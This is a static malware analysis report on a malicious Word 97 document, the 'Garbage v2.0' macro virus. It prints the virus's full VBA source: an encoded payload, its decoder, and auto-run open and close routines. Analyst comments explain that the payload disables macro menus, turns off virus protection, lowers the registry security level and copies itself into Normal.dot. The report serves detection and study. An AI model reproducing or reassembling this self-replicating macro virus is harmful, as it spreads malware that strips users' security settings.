Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 876b5b0e2cee0b28…

MALICIOUS

Office (OLE)

33.5 KB · Created: 2000-02-02 05:11:00 · Authoring application: Microsoft Word 8.0 · First seen: 2012-06-14
MD5: d6abe74ad6042ad0486f7bca84100e01 SHA-1: d500603e7b5a9aa68e6b56339dca1296997fb0f1 SHA-256: 876b5b0e2cee0b28b8a6912d2948fd97628076799f679f7a84436b171955271b
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious Office documents. The DOC BODY explicitly states 'I am infected with W97M.Junk.A', indicating a social engineering lure to encourage macro execution. The presence of VBA macros and the Document_Open event strongly suggests an attempt to execute malicious code upon opening the document, likely to download or execute a secondary payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Walker-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Walker-8
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10862 bytes
SHA-256: 15a7b6bbf8531e3d32c8ec2fa8c44448447dea35bedef2e71e4ba710c6eb6e30
Detection
ClamAV: Doc.Trojan.Walker-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function Heidi(WhereAmI As String)
'[Bench]Garbage v2.0
'----------------------------------------
'Po!Fssps!Sftvnf!Ofyu;!B`Zvq!>!Gbmtf;!O`Zvq!>!Gbmtf;!Bqqmjdbujpo/Pqujpot/DpogjsnDpowfstjpot!>!Gbmtf
'HkpfMg{*DwknfMg{Eqfg*yfMg{H33."yfMg{Cnv++0Fkucdng<"HkpfMg{*DwknfMg{Eqfg*yfMg{H:."yfMg{Cnv++0Fkucdng
'Zlwk#FrppdqgEduv+%Wrrov%,=#1Frqwurov+%Pdfur%,1Hqdeohg#@#3=#1Frqwurov+%Fxvwrpl}h111%,1Hqdeohg#@#3=#1Frqwurov+%Whpsodwhv#dqg#Dgg0Lqv111%,1Hqdeohg#@#3=#Hqg#Zlwk
'GsqqerhFevw,&Jsvqex&-2Gsrxvspw,&Wx}pi222&-2Irefpih$A$4>$GsqqerhFevw,&Zmi{&-2Gsrxvspw,&Xsspfevw&-2Irefpih$A$4
'X~xyjr3Uwn{fyjUwtknqjXywnsl-''1%'MPJ^dHZWWJSYdZXJWaXtky|fwjaRnhwtxtkyaTkknhja>35a\twiaXjhzwny~'1%'Qj{jq'.%B%6+
'Ol&Gvvroigzout4\kxyout&DC&?)&Znkt&IussgtjHgxy.(Sgixu(/4Iutzxury.(Yki{xoz 444(/4Jkrkzk&Kryk
'^p{o'Hwwspjh{pvu5Vw{pvuzA'5]py|zWyv{lj{pvu'D'7A'5Zh}lUvythsWyvtw{'D'7A'Luk'^p{o
'[m|(IL(E(Ik|q~mLwk}umv|6^JXzwrmk|6^JKwuxwvmv|{6Q|mu0916KwlmUwl}tmB([m|(V\(E(Vwzuit\muxti|m6^JXzwrmk|6^JKwuxwvmv|{6Q|mu0916KwlmUwl}tm
'JR)F)JM7urwn|1;5):2C)WR)F)W]7urwn|1;5):2
'Sp*KS*G*,1eLoxmrgQk|lkqo*€<8:,*^rox*Kic z*G*^| oD*Sp*XS*G*,1eLoxmrgQk|lkqo*€<8:,*^rox*Xic z*G*^| o
'Tq+Ljd€{+H+_}€p+Lyo+Yjd€{+H+_}€p+_spy+Pƒt +Q€yn tzy
'Ur,ctq~qMyU,I,.`qy|xm€q.,`tqzF,_q€,Om~~uq~,I,Z`F,_q€,t{ €,I,MPF,Qx qF,_q€,Om~~uq~,I,MPF,_q€,t{ €,I,Z`
'Tr{rP|qr-J-Pn  vr ;yv{r€5>9-Pn  vr ;P|‚{�\sYv{r€6
'Xjui!iptu;!/EfmfufMjoft!2-!/DpvouPgMjoft;!/JotfsuMjoft!2-!HfofDpef;!Foe!Xjui
'------------------------------------------
'------------------------------------------
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'-----------------------------------------
'-----------------------------------------
'
' --- Analyst notes. Placed after module line 34 on purpose: Document_Open
' --- addresses this function by 1-based CodeModule line index, so a comment
' --- inserted above the payload would shift the lines it reads and rewrites.
' Purpose: carrier for the encoded payload. As stored, the body is comments
' only, so nothing in it executes until Document_Open rewrites it.
' * Module lines 4-17 (the 14 shifted-text comments starting at "Po!Fssps...")
'   are VBA statements in which every character code was raised by a per-line
'   shift: 1 on line 4, 2 on line 5, ... 13 on line 16, then 1 again on line 17.
' * Module lines 20-33 (the 14 bare "'" lines) are the landing slots:
'   Document_Open strips the apostrophe from each encoded line, lowers every
'   character code with encrypt(), writes the result to line x + 16, then calls
'   Heidi(WhereAmI) so the decoded statements run as this function's body.
'   Document_Open (NormalTemplate) and Document_Close (ActiveDocument) then
'   overwrite lines 20-33 with "'" again, so the saved module is comment-only.
' * WhereAmI ("Template" or "Document", set by Document_Open) tells the decoded
'   body which module is the carrier and which is the target.
' Applying the shifts by hand (shift n on module line 3 + n) shows the payload:
'   disables the Alt+F11 and Alt+F8 key bindings; disables the Tools > Macro,
'   Customize..., Templates and Add-Ins..., Format > Style... and View >
'   Toolbars controls; deletes the Macro > Security... control when
'   Application.Version >= 9; sets Options.VirusProtection and
'   SaveNormalPrompt to 0; writes 1 to the Word "Security" / "Level" value under
'   HKEY_CURRENT_USER\Software\Microsoft\Office\9.0 via
'   System.PrivateProfileString; reads line 2 of both the ActiveDocument and
'   NormalTemplate code modules and exits if both already carry the
'   "'[Bench]Garbage v2.0" marker; otherwise copies this whole module from the
'   carrier into the other one with DeleteLines / InsertLines. A few characters
'   (rendered as spaces or U+FFFD above) were lost in extraction, so the exact
'   spelling of those lines is inferred from context.
' Detection / mitigation: the static "Obfuscation or payload: unlikely" finding
' undercounts this sample; the payload lives in comments and exists in
' executable form only at run time. Useful indicators are modification of
' Normal.dot(m), the registry value above, and VBProject / CodeModule access
' from Word (blocked by default in current Office unless "Trust access to the
' VBA project object model" is enabled).
End Function
Private Function encrypt(a, b As Integer)
' Caesar-style shift: returns a copy of a in which every character code has
' been lowered by b. Despite the name, Document_Open uses it to DEcode the
' shifted comment lines in Heidi (their codes were raised by the same amount).
' Params: a - text to shift (untyped Variant, read as a string)
'         b - amount subtracted from each character code
' Returns: the shifted text; "" for empty input.
' Errors (for example Chr of a negative code) are swallowed by
' On Error Resume Next, so an offending character may simply be dropped.
On Error Resume Next
Dim shifted, pos
shifted = ""
For pos = 1 To Len(a)
    shifted = shifted + Chr(Asc(Mid$(a, pos, 1)) - b)
Next
encrypt = shifted
End Function
' Runs automatically when the document is opened (the OLE_VBA_DOCOPEN finding).
' Decodes Heidi's shifted comment lines into its blank slots, runs the decoded
' body once, then blanks the slots again so the stored module stays comment-only.
' Nothing is declared: WhereAmI, host, x, y, crypt and l are implicit Variants.
Private Sub Document_Open()
' Every failure below (no VBProject access, bad line index, Chr error) is
' skipped silently, so the routine degrades quietly rather than alerting the user.
On Error Resume Next:
' Choose the module to rewrite: when this code runs from the Normal template,
' work on NormalTemplate's first VBComponent, otherwise on the active document's.
' WhereAmI is later passed to Heidi so the decoded body knows which side it is on.
' NOTE(review): reaching .VBProject requires programmatic access to the VBA
' object model, which current Office versions disable by default.
If MacroContainer = NormalTemplate Then: WhereAmI = "Template": Set host = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule: Else: WhereAmI = "Document": Set host = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
With host
    ' Module lines 4-17 (1-based) hold the encoded statements, one per line.
    For x = 4 To 17
    ' Shift key runs 1..13 for lines 4-16 and restarts at 1 for line 17.
    If y = 13 Then y = 0
    ' Read line x, drop its leading apostrophe (Right$ of Len - 1), lower every
    ' character code by y with encrypt(), and write the result 16 lines lower,
    ' i.e. into module lines 20-33, the bare "'" lines inside Heidi.
    crypt = .lines(x, 1): y = y + 1: l = Len(crypt): l = l - 1: crypt = Right$(crypt, l): .replaceline x + 16, encrypt(crypt, (y))
    Next x
End With
' Call Heidi now that lines 20-33 contain live statements; the decoded body
' executes here (the code evidently relies on VBA recompiling the edited module).
Heidi (WhereAmI)
' Always clean NormalTemplate's copy, whichever module was decoded above, by
' overwriting lines 20-33 with bare comments; Document_Close does the same for
' the active document.
Set host = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
With host: For x = 20 To 33: .replaceline x, "'": Next x: End With
End Sub
' Runs when the document closes. Writes the document back to disk without
' prompting, then blanks Heidi's decoded slots in the active document's module
' so the stored copy is comment-only again.
Private Sub Document_Close()
On Error Resume Next
' Hide the save/rewrite activity from the user.
Application.ScreenUpdating = False
' A document whose name does not start with "Document" already has a file on
' disk: re-save it in place so the current VBA project is persisted.
If Left$(ActiveDocument.Name, 8) <> "Document" Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
' An unsaved, empty "DocumentN" is marked as already saved, which suppresses
' Word's "save changes?" prompt (note the End If shares the next line).
ElseIf Left$(ActiveDocument.Name, 8) = "Document" And ActiveDocument.Characters.Count = 0 Then
ActiveDocument.Saved = True: End If
' Reset module lines 20-33 of the active document's first VBComponent to bare
' comments (mirrors the NormalTemplate cleanup at the end of Document_Open).
Set host = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
With host: For x = 20 To 33: .replaceline x, "'": Next x: End With
Application.ScreenUpdating = True
End Sub

' By [Bench] - Thanks go to The Weird Genius for the encryption idea


' Processing file: /opt/analyzer/scan_staging/b67af82a46794adfa8cba73b60c252ed.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8402 bytes
' Line #0:
' 	FuncDefn (Private Function Heidi(WhereAmI As String, id_FFFE As Variant))
' Line #1:
' 	QuoteRem 0x0000 0x0013 "[Bench]Garbage v2.0"
' Line #2:
' 	QuoteRem 0x0000 0x0028 "----------------------------------------"
' Line #3:
' 	QuoteRem 0x0000 0x0062 "Po!Fssps!Sftvnf!Ofyu;!B`Zvq!>!Gbmtf;!O`Zvq!>!Gbmtf;!Bqqmjdbujpo/Pqujpot/DpogjsnDpowfstjpot!>!Gbmtf"
' Line #4:
' 	QuoteRem 0x0000 0x0063 "HkpfMg{*DwknfMg{Eqfg*yfMg{H33."yfMg{Cnv++0Fkucdng<"HkpfMg{*DwknfMg{Eqfg*yfMg{H:."yfMg{Cnv++0Fkucdng"
' Line #5:
' 	QuoteRem 0x0000 0
... (truncated)